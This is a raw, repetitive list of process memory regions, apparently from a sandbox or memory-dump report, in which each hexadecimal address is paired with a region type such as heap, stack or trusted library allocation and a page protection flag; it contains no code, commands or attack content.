trusted library allocation
page read and write
2435DF44000
trusted library allocation
page read and write
2435DFD1000
trusted library allocation
page read and write
383B000
heap
page read and write
184C725F000
trusted library allocation
page read and write
243638CD000
trusted library allocation
page read and write
2434DA78000
heap
page read and write
24368334000
trusted library allocation
page read and write
2436849E000
trusted library allocation
page read and write
2434DACA000
heap
page read and write
2FC0000
direct allocation
page read and write
184C7E50000
trusted library allocation
page read and write
184C727A000
trusted library allocation
page read and write
2435BA31000
trusted library allocation
page read and write
1F527510000
unclassified section
page read and write
3350000
direct allocation
page read and write
8B2C3FC000
stack
page read and write
2435DBBD000
trusted library allocation
page read and write
2435ED43000
trusted library allocation
page read and write
2434DABC000
heap
page read and write
2BB2000
heap
page read and write
2435C8E0000
trusted library allocation
page read and write
2434DA8F000
heap
page read and write
2435B4BE000
trusted library allocation
page read and write
2435ED94000
trusted library allocation
page read and write
2434DAC7000
heap
page read and write
2435C9DD000
trusted library allocation
page read and write
2434DA93000
heap
page read and write
2435EFA0000
trusted library allocation
page read and write
2434DAC7000
heap
page read and write
243680FE000
trusted library allocation
page read and write
2435CF23000
trusted library allocation
page read and write
24358D7D000
trusted library allocation
page read and write
2435C09F000
trusted library allocation
page read and write
243681D4000
trusted library allocation
page read and write
2435DFB3000
trusted library allocation
page read and write
2436937C000
trusted library allocation
page read and write
243680CF000
trusted library allocation
page read and write
2435EEC0000
trusted library allocation
page read and write
243684A4000
trusted library allocation
page read and write
1B30000
heap
page read and write
2435E1E7000
trusted library allocation
page read and write
2435C09B000
trusted library allocation
page read and write
184C7210000
trusted library allocation
page read and write
2435E1AB000
trusted library allocation
page read and write
2435DFF9000
trusted library allocation
page read and write
2435D095000
trusted library allocation
page read and write
2435E2C4000
trusted library allocation
page read and write
2435E224000
trusted library allocation
page read and write
32B0000
direct allocation
page read and write
184C70C0000
heap
page readonly
2435DE59000
trusted library allocation
page read and write
2435E455000
trusted library allocation
page read and write
1F527714000
trusted library allocation
page read and write
24357DDB000
trusted library allocation
page read and write
2435B46D000
trusted library allocation
page read and write
2435B4B8000
trusted library allocation
page read and write
BB0C000
heap
page read and write
2435C03C000
trusted library allocation
page read and write
243658B1000
trusted library allocation
page read and write
2435EF09000
trusted library allocation
page read and write
2435C0AA000
trusted library allocation
page read and write
2435E1F6000
trusted library allocation
page read and write
24357C23000
trusted library allocation
page read and write
184C7ED8000
heap
page read and write
25EFE700000
trusted library allocation
page read and write
2434DA9B000
heap
page read and write
2435E25C000
trusted library allocation
page read and write
2435E1F6000
trusted library allocation
page read and write
2435E29D000
trusted library allocation
page read and write
243653E1000
trusted library allocation
page read and write
2435C7F5000
trusted library allocation
page read and write
40F000
unkown
page readonly
25EFE000000
unclassified section
page readonly
2435EF91000
trusted library allocation
page read and write
2436348E000
trusted library allocation
page read and write
2BB2000
heap
page read and write
184C7E42000
heap
page read and write
2435EFC3000
trusted library allocation
page read and write
2435B4B1000
trusted library allocation
page read and write
243577CA000
heap
page read and write
24358F90000
trusted library allocation
page read and write
2434D112000
heap
page read and write
2435C704000
trusted library allocation
page read and write
24368483000
trusted library allocation
page read and write
243689FC000
trusted library allocation
page read and write
243637E1000
trusted library allocation
page read and write
ED04FFE000
stack
page read and write
2435C8F4000
trusted library allocation
page read and write
2435E22C000
trusted library allocation
page read and write
D40000
unkown
page readonly
24358FF5000
trusted library allocation
page read and write
243689F2000
trusted library allocation
page read and write
2435BAC9000
trusted library allocation
page read and write
2435B4B1000
trusted library allocation
page read and write
2435E2F1000
trusted library allocation
page read and write
2435EF70000
trusted library allocation
page read and write
24368375000
trusted library allocation
page read and write
24358DAD000
trusted library allocation
page read and write
1F5274C0000
heap
page read and write
2434DAEA000
heap
page read and write
2B24000
heap
page read and write
243658B9000
trusted library allocation
page read and write
25EFE51A000
trusted library allocation
page read and write
2434DAB6000
heap
page read and write
243637FD000
trusted library allocation
page read and write
2436814D000
trusted library allocation
page read and write
2434DAB2000
heap
page read and write
2435EF27000
trusted library allocation
page read and write
60AA07E000
stack
page read and write
2435C7C3000
trusted library allocation
page read and write
2434DA93000
heap
page read and write
2435E254000
trusted library allocation
page read and write
243654B0000
trusted library allocation
page read and write
2BB1000
heap
page read and write
243680FE000
trusted library allocation
page read and write
2434DABD000
heap
page read and write
2435EE8C000
trusted library allocation
page read and write
2A5E000
stack
page read and write
763000
heap
page read and write
60A8FFE000
stack
page read and write
2434DAB5000
heap
page read and write
243574CE000
trusted library allocation
page read and write
2435E2D6000
trusted library allocation
page read and write
2435C97A000
trusted library allocation
page read and write
2435BA56000
trusted library allocation
page read and write
B438000
heap
page read and write
2417000
heap
page read and write
24357DFE000
trusted library allocation
page read and write
243652F6000
trusted library allocation
page read and write
2434DABC000
heap
page read and write
2435B469000
trusted library allocation
page read and write
2AF7000
heap
page read and write
24363436000
trusted library allocation
page read and write
1290000
unkown
page read and write
3770000
direct allocation
page read and write
2435B4BE000
trusted library allocation
page read and write
2434DA8B000
heap
page read and write
243633A2000
trusted library allocation
page read and write
25EFE58F000
trusted library allocation
page read and write
243577CA000
heap
page read and write
24358DAD000
trusted library allocation
page read and write
243658BD000
trusted library allocation
page read and write
2436524D000
trusted library allocation
page read and write
24358FFE000
trusted library allocation
page read and write
2435B670000
trusted library allocation
page read and write
24368494000
trusted library allocation
page read and write
2F70000
direct allocation
page read and write
1F527856000
heap
page read and write
24358D69000
trusted library allocation
page read and write
243652E0000
trusted library allocation
page read and write
1C10000
heap
page read and write
2435EEC7000
trusted library allocation
page read and write
2435EE76000
trusted library allocation
page read and write
2435C761000
trusted library allocation
page read and write
1C0C000
heap
page read and write
2435BABB000
trusted library allocation
page read and write
2435DF6A000
trusted library allocation
page read and write
24357D26000
trusted library allocation
page read and write
24363875000
trusted library allocation
page read and write
2435BA13000
trusted library allocation
page read and write
1C0B000
heap
page read and write
2435D45A000
trusted library allocation
page read and write
2434DAB0000
heap
page read and write
2435E148000
trusted library allocation
page read and write
2435E2FB000
trusted library allocation
page read and write
2435B8C7000
trusted library allocation
page read and write
11A6000
unkown
page readonly
2436373E000
trusted library allocation
page read and write
2435EFE1000
trusted library allocation
page read and write
2434DA7E000
heap
page read and write
2434DA7D000
heap
page read and write
2435DD71000
trusted library allocation
page read and write
243577BC000
heap
page read and write
2436968D000
heap
page read and write
24358F9B000
trusted library allocation
page read and write
24358D66000
trusted library allocation
page read and write
2435E137000
trusted library allocation
page read and write
243577B7000
heap
page read and write
2435C8E3000
trusted library allocation
page read and write
184C7EE7000
heap
page read and write
2435EFBB000
trusted library allocation
page read and write
2435EEC0000
trusted library allocation
page read and write
2435EF27000
trusted library allocation
page read and write
2436373F000
trusted library allocation
page read and write
2435E2D6000
trusted library allocation
page read and write
2435DF88000
trusted library allocation
page read and write
2435C09D000
trusted library allocation
page read and write
BD5B000
heap
page read and write
1831000
heap
page read and write
3B10000
direct allocation
page read and write
ED067FF000
stack
page read and write
24368ACD000
trusted library allocation
page read and write
243681E9000
trusted library allocation
page read and write
37F0000
direct allocation
page read and write
24363472000
trusted library allocation
page read and write
243656C3000
trusted library allocation
page read and write
243680FE000
trusted library allocation
page read and write
2435E453000
trusted library allocation
page read and write
2435C8E6000
trusted library allocation
page read and write
2435DFE0000
trusted library allocation
page read and write
2435B88C000
trusted library allocation
page read and write
2434DA77000
heap
page read and write
2435B626000
trusted library allocation
page read and write
3850000
heap
page read and write
2435B8D5000
trusted library allocation
page read and write
243684CF000
trusted library allocation
page read and write
2435BAC9000
trusted library allocation
page read and write
2434DAC1000
heap
page read and write
24365852000
trusted library allocation
page read and write
243577AA000
heap
page read and write
2435CD0C000
trusted library allocation
page read and write
2435B4A5000
trusted library allocation
page read and write
2435E2E9000
trusted library allocation
page read and write
24358F0F000
trusted library allocation
page read and write
15468451E000
trusted library allocation
page read and write
2435B766000
trusted library allocation
page read and write
24363748000
trusted library allocation
page read and write
24368AA9000
trusted library allocation
page read and write
24358D70000
trusted library allocation
page read and write
2435C0E0000
trusted library allocation
page read and write
2BB1000
heap
page read and write
2435E271000
trusted library allocation
page read and write
24368382000
trusted library allocation
page read and write
37A0000
direct allocation
page read and write
2B19000
heap
page read and write
243655A1000
trusted library allocation
page read and write
243577B4000
heap
page read and write
2434DA93000
heap
page read and write
2435E1EE000
trusted library allocation
page read and write
2499000
heap
page read and write
24368AE2000
trusted library allocation
page read and write
323E000
heap
page read and write
2435C7EB000
trusted library allocation
page read and write
2435EFE1000
trusted library allocation
page read and write
2A5C000
heap
page read and write
2435E45B000
trusted library allocation
page read and write
24368112000
trusted library allocation
page read and write
2435C75F000
trusted library allocation
page read and write
243680FE000
trusted library allocation
page read and write
243655EA000
trusted library allocation
page read and write
295A9A87000
heap
page read and write
2435B4B8000
trusted library allocation
page read and write
243577D3000
heap
page read and write
2435EF0B000
trusted library allocation
page read and write
3750000
direct allocation
page read and write
403000
unkown
page execute read
2435C793000
trusted library allocation
page read and write
243680DD000
trusted library allocation
page read and write
2435E29D000
trusted library allocation
page read and write
2435B8C1000
trusted library allocation
page read and write
2435DF62000
trusted library allocation
page read and write
184C7EE7000
heap
page read and write
243638A2000
trusted library allocation
page read and write
C3E000
stack
page read and write
2435E1FE000
trusted library allocation
page read and write
2435C86E000
trusted library allocation
page read and write
243656B6000
trusted library allocation
page read and write
2434DAC8000
heap
page read and write
2434DACA000
heap
page read and write
2434DAD0000
heap
page read and write
D08000
heap
page read and write
2435C085000
trusted library allocation
page read and write
2436585C000
trusted library allocation
page read and write
19C000
stack
page read and write
24365358000
trusted library allocation
page read and write
2A66000
heap
page read and write
2434DA9E000
heap
page read and write
24363831000
trusted library allocation
page read and write
295A9D00000
trusted library allocation
page read and write
24358DF2000
trusted library allocation
page read and write
2435C998000
trusted library allocation
page read and write
2435DFD7000
trusted library allocation
page read and write
24358F64000
trusted library allocation
page read and write
2435DFB3000
trusted library allocation
page read and write
2435EF35000
trusted library allocation
page read and write
1C10000
heap
page read and write
2434DA90000
heap
page read and write
2AFB000
heap
page read and write
24358F13000
trusted library allocation
page read and write
2435EF25000
trusted library allocation
page read and write
2435E0CB000
trusted library allocation
page read and write
432000
unkown
page read and write
2434DAC6000
heap
page read and write
2435938F000
trusted library allocation
page read and write
24368307000
trusted library allocation
page read and write
2435E10B000
trusted library allocation
page read and write
2435C0AE000
trusted library allocation
page read and write
2435BA56000
trusted library allocation
page read and write
2435BAC0000
trusted library allocation
page read and write
60AB87E000
unkown
page readonly
2434DAB0000
heap
page read and write
1F5277A0000
trusted library allocation
page read and write
2435C725000
trusted library allocation
page read and write
2435C8F0000
trusted library allocation
page read and write
2435C8E4000
trusted library allocation
page read and write
2435DD0E000
trusted library allocation
page read and write
24368356000
trusted library allocation
page read and write
2435CC2D000
trusted library allocation
page read and write
2435E25C000
trusted library allocation
page read and write
2435C7C3000
trusted library allocation
page read and write
BB08000
heap
page read and write
243681FC000
trusted library allocation
page read and write
D40000
unkown
page readonly
2436524D000
trusted library allocation
page read and write
2BB2000
heap
page read and write
2435BAD5000
trusted library allocation
page read and write
9EE000
stack
page read and write
243574EF000
trusted library allocation
page read and write
2435C085000
trusted library allocation
page read and write
2434DA93000
heap
page read and write
2436897C000
trusted library allocation
page read and write
243681CB000
trusted library allocation
page read and write
2435BA74000
trusted library allocation
page read and write
2434DABD000
heap
page read and write
2435EF0D000
trusted library allocation
page read and write
2435C074000
trusted library allocation
page read and write
2435DE0F000
trusted library allocation
page read and write
184C7DEC000
heap
page read and write
2435EF9C000
trusted library allocation
page read and write
2435EF0D000
trusted library allocation
page read and write
24358D7D000
trusted library allocation
page read and write
2435E16B000
trusted library allocation
page read and write
2435E13A000
trusted library allocation
page read and write
2435B866000
trusted library allocation
page read and write
2435E15F000
trusted library allocation
page read and write
24357D1A000
trusted library allocation
page read and write
24358DAD000
trusted library allocation
page read and write
2435E265000
trusted library allocation
page read and write
2434DABD000
heap
page read and write
2435EF44000
trusted library allocation
page read and write
24368369000
trusted library allocation
page read and write
36B0000
direct allocation
page read and write
2434DA78000
heap
page read and write
24365343000
trusted library allocation
page read and write
24358DDC000
trusted library allocation
page read and write
2435DFF4000
trusted library allocation
page read and write
2435E129000
trusted library allocation
page read and write
24358F64000
trusted library allocation
page read and write
B9FC43E000
stack
page read and write
2435ED9E000
trusted library allocation
page read and write
2435C09F000
trusted library allocation
page read and write
2435DFDF000
trusted library allocation
page read and write
2435B8AE000
trusted library allocation
page read and write
2435EFFA000
trusted library allocation
page read and write
2435BAF2000
trusted library allocation
page read and write
2435EE98000
trusted library allocation
page read and write
B9FBC3E000
unkown
page readonly
243652EF000
trusted library allocation
page read and write
2435EFC3000
trusted library allocation
page read and write
243638E9000
trusted library allocation
page read and write
24368005000
trusted library allocation
page read and write
2434DA88000
heap
page read and write
2434DACA000
heap
page read and write
B728000
heap
page read and write
243689D6000
trusted library allocation
page read and write
2435DE9F000
trusted library allocation
page read and write
2435B77D000
trusted library allocation
page read and write
2435ED9C000
trusted library allocation
page read and write
2435B4A5000
trusted library allocation
page read and write
243689C7000
trusted library allocation
page read and write
243681CB000
trusted library allocation
page read and write
24363469000
trusted library allocation
page read and write
2435B4B4000
trusted library allocation
page read and write
2435C8C0000
trusted library allocation
page read and write
2435EF35000
trusted library allocation
page read and write
2435DFBA000
trusted library allocation
page read and write
2434DAC8000
heap
page read and write
39F0000
direct allocation
page read and write
2434DAB0000
heap
page read and write
2434DAB9000
heap
page read and write
2435B76B000
trusted library allocation
page read and write
21CE000
heap
page read and write
24363830000
trusted library allocation
page read and write
243689E8000
trusted library allocation
page read and write
2434DAC7000
heap
page read and write
2435E10B000
trusted library allocation
page read and write
2435EFA8000
trusted library allocation
page read and write
2435E137000
trusted library allocation
page read and write
2435C099000
trusted library allocation
page read and write
243658BD000
trusted library allocation
page read and write
24369652000
heap
page read and write
24358F38000
trusted library allocation
page read and write
2435E18B000
trusted library allocation
page read and write
2435B77D000
trusted library allocation
page read and write
2435C8F6000
trusted library allocation
page read and write
2435B4A7000
trusted library allocation
page read and write
2435B8AE000
trusted library allocation
page read and write
321D000
heap
page read and write
2435B8E2000
trusted library allocation
page read and write
2435E143000
trusted library allocation
page read and write
B9FBBFE000
unkown
page readonly
2435C707000
trusted library allocation
page read and write
3410000
direct allocation
page read and write
2435B4C2000
trusted library allocation
page read and write
2435C7A7000
trusted library allocation
page read and write
24358F89000
trusted library allocation
page read and write
2434DA9B000
heap
page read and write
2435E1F6000
trusted library allocation
page read and write
3C70000
direct allocation
page read and write
2435D0DC000
trusted library allocation
page read and write
24358FB1000
trusted library allocation
page read and write
2435E248000
trusted library allocation
page read and write
24369654000
heap
page read and write
2435EE98000
trusted library allocation
page read and write
2436389F000
trusted library allocation
page read and write
24363432000
trusted library allocation
page read and write
24364D1A000
trusted library allocation
page read and write
2435E0F8000
trusted library allocation
page read and write
2435C75D000
trusted library allocation
page read and write
2434DAE1000
heap
page read and write
1F5273E0000
heap
page read and write
2434DA90000
heap
page read and write
2434DAB0000
heap
page read and write
2435B889000
trusted library allocation
page read and write
2435C8A6000
trusted library allocation
page read and write
2435E2FD000
trusted library allocation
page read and write
2434DAC7000
heap
page read and write
24357C23000
trusted library allocation
page read and write
438000
unkown
page readonly
2435C0F2000
trusted library allocation
page read and write
3490000
direct allocation
page read and write
24368314000
trusted library allocation
page read and write
2436804D000
trusted library allocation
page read and write
2435E4EC000
trusted library allocation
page read and write
2434DA90000
heap
page read and write
60A74DE000
unkown
page readonly
243680E9000
trusted library allocation
page read and write
2435E4E2000
trusted library allocation
page read and write
2435DD17000
trusted library allocation
page read and write
24369649000
heap
page read and write
2BB2000
heap
page read and write
B695000
heap
page read and write
2435E148000
trusted library allocation
page read and write
24368377000
trusted library allocation
page read and write
2435E140000
trusted library allocation
page read and write
2435DF7D000
trusted library allocation
page read and write
24368956000
trusted library allocation
page read and write
1F527712000
trusted library allocation
page read and write
2435E1F6000
trusted library allocation
page read and write
2435C0E0000
trusted library allocation
page read and write
2435E279000
trusted library allocation
page read and write
2435ED6C000
trusted library allocation
page read and write
2B1B000
heap
page read and write
2435D04B000
trusted library allocation
page read and write
2435B4A5000
trusted library allocation
page read and write
2435DE4B000
trusted library allocation
page read and write
401000
unkown
page execute read
184C7E91000
heap
page read and write
B457000
heap
page read and write
243652CA000
trusted library allocation
page read and write
2435D000000
trusted library allocation
page read and write
243658AC000
trusted library allocation
page read and write
24368988000
trusted library allocation
page read and write
2434DA7D000
heap
page read and write
468463E000
unkown
page readonly
2434DACA000
heap
page read and write
2434DAB9000
heap
page read and write
243658BC000
trusted library allocation
page read and write
25EFE57B000
trusted library allocation
page read and write
243683D9000
trusted library allocation
page read and write
243655D8000
trusted library allocation
page read and write
2435C7F5000
trusted library allocation
page read and write
2435BA56000
trusted library allocation
page read and write
2435B6EB000
trusted library allocation
page read and write
2434DABC000
heap
page read and write
D40000
unkown
page readonly
2435C75F000
trusted library allocation
page read and write
2435D094000
trusted library allocation
page read and write
24359363000
trusted library allocation
page read and write
2435DFF4000
trusted library allocation
page read and write
243684B3000
trusted library allocation
page read and write
2436813D000
trusted library allocation
page read and write
BB05000
heap
page read and write
2434DA7D000
heap
page read and write
2435BA93000
trusted library allocation
page read and write
24365861000
trusted library allocation
page read and write
2436372A000
trusted library allocation
page read and write
2435B44C000
trusted library allocation
page read and write
2435EFA8000
trusted library allocation
page read and write
24369438000
trusted library allocation
page read and write
24358F62000
trusted library allocation
page read and write
2435C0FE000
trusted library allocation
page read and write
2435C872000
trusted library allocation
page read and write
326E000
heap
page read and write
2434DA76000
heap
page read and write
2435938B000
trusted library allocation
page read and write
24357481000
trusted library allocation
page read and write
24369671000
heap
page read and write
3940000
direct allocation
page read and write
243577D6000
heap
page read and write
2435E10B000
trusted library allocation
page read and write
243658B8000
trusted library allocation
page read and write
243638A1000
trusted library allocation
page read and write
3790000
direct allocation
page read and write
60AB07E000
stack
page read and write
2434DABD000
heap
page read and write
2435C74B000
trusted library allocation
page read and write
243650F0000
trusted library allocation
page read and write
24368196000
trusted library allocation
page read and write
2434DAD0000
heap
page read and write
2BB2000
heap
page read and write
24358FD5000
trusted library allocation
page read and write
243684E3000
trusted library allocation
page read and write
2435DDDD000
trusted library allocation
page read and write
2434DAC7000
heap
page read and write
24358D7D000
trusted library allocation
page read and write
243680E0000
trusted library allocation
page read and write
243655EA000
trusted library allocation
page read and write
2435B4C7000
trusted library allocation
page read and write
2434DAE4000
heap
page read and write
24358FB3000
trusted library allocation
page read and write
98000
stack
page read and write
2434DA84000
heap
page read and write
2435C7FD000
trusted library allocation
page read and write
2435B8E2000
trusted library allocation
page read and write
184C7DB9000
heap
page read and write
2435E1A8000
trusted library allocation
page read and write
24368363000
trusted library allocation
page read and write
2435CC56000
trusted library allocation
page read and write
2AFA000
heap
page read and write
2435CE73000
trusted library allocation
page read and write
243680F8000
trusted library allocation
page read and write
2435E2F1000
trusted library allocation
page read and write
243638B9000
trusted library allocation
page read and write
2435B4E9000
trusted library allocation
page read and write
2435E2E3000
trusted library allocation
page read and write
2434DA7A000
heap
page read and write
2435E20F000
trusted library allocation
page read and write
2435C7F5000
trusted library allocation
page read and write
2435E0E8000
trusted library allocation
page read and write
2434DABC000
heap
page read and write
184C7E41000
heap
page read and write
243633C2000
trusted library allocation
page read and write
2435CA05000
trusted library allocation
page read and write
2435E13A000
trusted library allocation
page read and write
3B70000
direct allocation
page read and write
2436371F000
trusted library allocation
page read and write
2435E127000
trusted library allocation
page read and write
2435D0E7000
trusted library allocation
page read and write
B9FB3FE000
stack
page read and write
3990000
direct allocation
page read and write
2435DF27000
trusted library allocation
page read and write
184C7DB9000
heap
page read and write
2435E1F8000
trusted library allocation
page read and write
2434DA93000
heap
page read and write
24363807000
trusted library allocation
page read and write
119E000
unkown
page write copy
243684B3000
trusted library allocation
page read and write
2435D0A1000
trusted library allocation
page read and write
243650F0000
trusted library allocation
page read and write
2435C75F000
trusted library allocation
page read and write
2435E26D000
trusted library allocation
page read and write
28F4000
heap
page read and write
2435E258000
trusted library allocation
page read and write
25EFE703000
trusted library allocation
page read and write
4680BD8000
stack
page read and write
243655E5000
trusted library allocation
page read and write
220E000
stack
page read and write
243689D2000
trusted library allocation
page read and write
2435DF8C000
trusted library allocation
page read and write
2435C7CF000
trusted library allocation
page read and write
2435E149000
trusted library allocation
page read and write
243577B6000
heap
page read and write
243658B8000
trusted library allocation
page read and write
24357C2F000
trusted library allocation
page read and write
243577CA000
heap
page read and write
243574EF000
trusted library allocation
page read and write
184C7E4C000
heap
page read and write
2435D5C3000
trusted library allocation
page read and write
2435DFB4000
trusted library allocation
page read and write
2435C827000
trusted library allocation
page read and write
2435CA07000
trusted library allocation
page read and write
24357D1E000
trusted library allocation
page read and write
2434DAB2000
heap
page read and write
2435C92B000
trusted library allocation
page read and write
2435EF72000
trusted library allocation
page read and write
2435E256000
trusted library allocation
page read and write
2435DEFC000
trusted library allocation
page read and write
24368315000
trusted library allocation
page read and write
243684EB000
trusted library allocation
page read and write
2BB2000
heap
page read and write
24358DC6000
trusted library allocation
page read and write
3640000
direct allocation
page read and write
3330000
direct allocation
page read and write
2435B4E2000
trusted library allocation
page read and write
2435B8E2000
trusted library allocation
page read and write
B470000
heap
page read and write
2435C9CB000
trusted library allocation
page read and write
2435C759000
trusted library allocation
page read and write
2435C7A6000
trusted library allocation
page read and write
2AF7000
heap
page read and write
2436812D000
trusted library allocation
page read and write
2435B4E9000
trusted library allocation
page read and write
2434DAD0000
heap
page read and write
2435B85C000
trusted library allocation
page read and write
243680FA000
trusted library allocation
page read and write
2435C82D000
trusted library allocation
page read and write
2435EF35000
trusted library allocation
page read and write
243683DE000
trusted library allocation
page read and write
2435E0F7000
trusted library allocation
page read and write
1F527390000
heap
page read and write
2435C7EB000
trusted library allocation
page read and write
2435DF3F000
trusted library allocation
page read and write
2435C759000
trusted library allocation
page read and write
2435EFBB000
trusted library allocation
page read and write
243680E2000
trusted library allocation
page read and write
2435E15A000
trusted library allocation
page read and write
1F52772E000
trusted library allocation
page read and write
2434DAB8000
heap
page read and write
24368354000
trusted library allocation
page read and write
2BB2000
heap
page read and write
2434DA9B000
heap
page read and write
24368196000
trusted library allocation
page read and write
2435EEC0000
trusted library allocation
page read and write
2435E2F9000
trusted library allocation
page read and write
2435DE51000
trusted library allocation
page read and write
309D000
heap
page read and write
2BB2000
heap
page read and write
2435E2DF000
trusted library allocation
page read and write
2434DAC8000
heap
page read and write
295A9A73000
heap
page read and write
2435CFD3000
trusted library allocation
page read and write
2435E2E9000
trusted library allocation
page read and write
24369412000
trusted library allocation
page read and write
184C7ED8000
heap
page read and write
2435C0F2000
trusted library allocation
page read and write
2435DB8D000
trusted library allocation
page read and write
3320000
direct allocation
page read and write
2435BAC9000
trusted library allocation
page read and write
1E8C160A000
trusted library allocation
page read and write
2435C08C000
trusted library allocation
page read and write
4B9F000
stack
page read and write
2435C7C3000
trusted library allocation
page read and write
2434DAB8000
heap
page read and write
2435E137000
trusted library allocation
page read and write
2435B89E000
trusted library allocation
page read and write
184C6F40000
heap
page read and write
2435B4C6000
trusted library allocation
page read and write
24358DB2000
trusted library allocation
page read and write
2435C767000
trusted library allocation
page read and write
243681FC000
trusted library allocation
page read and write
2435B71C000
trusted library allocation
page read and write
2435C767000
trusted library allocation
page read and write
24365858000
trusted library allocation
page read and write
243683DE000
trusted library allocation
page read and write
2435C7EB000
trusted library allocation
page read and write
2435BA83000
trusted library allocation
page read and write
2435B8FC000
trusted library allocation
page read and write
2435ED57000
trusted library allocation
page read and write
2435DFF4000
trusted library allocation
page read and write
2435DF84000
trusted library allocation
page read and write
2BB2000
heap
page read and write
184C7E41000
heap
page read and write
24363871000
trusted library allocation
page read and write
2436344D000
trusted library allocation
page read and write
24368361000
trusted library allocation
page read and write
2434DAB6000
heap
page read and write
24357DFE000
trusted library allocation
page read and write
2435C752000
trusted library allocation
page read and write
60AA87E000
unkown
page readonly
3970000
direct allocation
page read and write
24357D93000
trusted library allocation
page read and write
2435DF76000
trusted library allocation
page read and write
2434DAB9000
heap
page read and write
46823FE000
unkown
page readonly
25EFE600000
heap
page read and write
2435E137000
trusted library allocation
page read and write
2434DA76000
heap
page read and write
24358FD5000
trusted library allocation
page read and write
2435DE1A000
trusted library allocation
page read and write
BA1F000
heap
page read and write
24363440000
trusted library allocation
page read and write
24357E00000
trusted library allocation
page read and write
25EFE503000
trusted library allocation
page read and write
2435ED30000
trusted library allocation
page read and write
2435C896000
trusted library allocation
page read and write
2435B76B000
trusted library allocation
page read and write
184C7D58000
heap
page read and write
2435930E000
trusted library allocation
page read and write
243684E5000
trusted library allocation
page read and write
24368956000
trusted library allocation
page read and write
184C7E3F000
heap
page read and write
24358DC6000
trusted library allocation
page read and write
3872000
heap
page read and write
2436847D000
trusted library allocation
page read and write
2435CE89000
trusted library allocation
page read and write
2435C8BF000
trusted library allocation
page read and write
24357C2F000
trusted library allocation
page read and write
2434DAC1000
heap
page read and write
1F52777B000
trusted library allocation
page read and write
3835000
heap
page read and write
2434DAD2000
heap
page read and write
2435DF78000
trusted library allocation
page read and write
2435BA4F000
trusted library allocation
page read and write
B77B000
heap
page read and write
11A6000
unkown
page readonly
2435C8EB000
trusted library allocation
page read and write
2434DAB2000
heap
page read and write
2435E25C000
trusted library allocation
page read and write
2435CC9F000
trusted library allocation
page read and write
2435DF9E000
trusted library allocation
page read and write
243684AC000
trusted library allocation
page read and write
243689CE000
trusted library allocation
page read and write
2435C9DD000
trusted library allocation
page read and write
2435DF0D000
trusted library allocation
page read and write
2435BABB000
trusted library allocation
page read and write
24368196000
trusted library allocation
page read and write
2435C0DD000
trusted library allocation
page read and write
2435B4AE000
trusted library allocation
page read and write
243681B7000
trusted library allocation
page read and write
243658DF000
trusted library allocation
page read and write
2435B76D000
trusted library allocation
page read and write
3D10000
direct allocation
page read and write
2435E2F3000
trusted library allocation
page read and write
243653F8000
trusted library allocation
page read and write
2435BA83000
trusted library allocation
page read and write
2435E13C000
trusted library allocation
page read and write
24358D8F000
trusted library allocation
page read and write
2435B8CB000
trusted library allocation
page read and write
2435B413000
trusted library allocation
page read and write
184C6F00000
unclassified section
page readonly
2434DAB9000
heap
page read and write
2435EFE1000
trusted library allocation
page read and write
2435E098000
trusted library allocation
page read and write
24358D7D000
trusted library allocation
page read and write
2435BA83000
trusted library allocation
page read and write
2434DA90000
heap
page read and write
326E000
heap
page read and write
2434DA93000
heap
page read and write
2435C72D000
trusted library allocation
page read and write
2435E14E000
trusted library allocation
page read and write
243638EE000
trusted library allocation
page read and write
2435C0FD000
trusted library allocation
page read and write
4684E3E000
stack
page read and write
2435C0DD000
trusted library allocation
page read and write
2435EFC7000
trusted library allocation
page read and write
243650E2000
trusted library allocation
page read and write
31A2000
heap
page read and write
24357C71000
trusted library allocation
page read and write
2435BABB000
trusted library allocation
page read and write
24365898000
trusted library allocation
page read and write
24358DE2000
trusted library allocation
page read and write
243652B3000
trusted library allocation
page read and write
2434DAB5000
heap
page read and write
1F527520000
heap
page read and write
24369605000
heap
page read and write
2436382B000
trusted library allocation
page read and write
2435E082000
trusted library allocation
page read and write
2435C08C000
trusted library allocation
page read and write
24368318000
trusted library allocation
page read and write
24368361000
trusted library allocation
page read and write
2435EFFA000
trusted library allocation
page read and write
2435DEB6000
trusted library allocation
page read and write
2435E45B000
trusted library allocation
page read and write
243638AF000
trusted library allocation
page read and write
2435B85C000
trusted library allocation
page read and write
184C7DBC000
heap
page read and write
2435DAC4000
trusted library allocation
page read and write
243680E0000
trusted library allocation
page read and write
243681D4000
trusted library allocation
page read and write
2436848E000
trusted library allocation
page read and write
2436387A000
trusted library allocation
page read and write
3C90000
direct allocation
page read and write
2435DC4C000
trusted library allocation
page read and write
2435DFF4000
trusted library allocation
page read and write
2435E1F0000
trusted library allocation
page read and write
2435E244000
trusted library allocation
page read and write
2435B7CA000
trusted library allocation
page read and write
2434DABF000
heap
page read and write
31B8000
heap
page read and write
318D000
heap
page read and write
2435C0E5000
trusted library allocation
page read and write
365F000
stack
page read and write
2434DAB4000
heap
page read and write
2435E254000
trusted library allocation
page read and write
2435BA74000
trusted library allocation
page read and write
2434DA93000
heap
page read and write
24358D66000
trusted library allocation
page read and write
2434DA76000
heap
page read and write
2435BADC000
trusted library allocation
page read and write
2435CFCD000
trusted library allocation
page read and write
2435DFBA000
trusted library allocation
page read and write
24359355000
trusted library allocation
page read and write
24363493000
trusted library allocation
page read and write
37B0000
direct allocation
page read and write
184C7E33000
heap
page read and write
2435D0ED000
trusted library allocation
page read and write
2435B769000
trusted library allocation
page read and write
60A7FD8000
stack
page read and write
2435DFE2000
trusted library allocation
page read and write
24363721000
trusted library allocation
page read and write
3250000
heap
page read and write
2435DFF9000
trusted library allocation
page read and write
25EFE170000
heap
page read and write
243680FE000
trusted library allocation
page read and write
184C7DB0000
heap
page read and write
243593D1000
trusted library allocation
page read and write
2435B8D5000
trusted library allocation
page read and write
24363464000
trusted library allocation
page read and write
2435E0F0000
trusted library allocation
page read and write
2435B4AE000
trusted library allocation
page read and write
2435DFDB000
trusted library allocation
page read and write
2434DAB5000
heap
page read and write
2434DAB6000
heap
page read and write
2436373A000
trusted library allocation
page read and write
24363871000
trusted library allocation
page read and write
2435B6FC000
trusted library allocation
page read and write
2435E1EA000
trusted library allocation
page read and write
2434DAB8000
heap
page read and write
2435B79B000
trusted library allocation
page read and write
184C7E3F000
heap
page read and write
2435E1C3000
trusted library allocation
page read and write
2434DA93000
heap
page read and write
243658E5000
trusted library allocation
page read and write
2434DA7E000
heap
page read and write
2FD0000
direct allocation
page read and write
2435BACF000
trusted library allocation
page read and write
184C7EAB000
heap
page read and write
323E000
heap
page read and write
25EFDF70000
unclassified section
page readonly
2A80000
direct allocation
page read and write
24368958000
trusted library allocation
page read and write
184C7903000
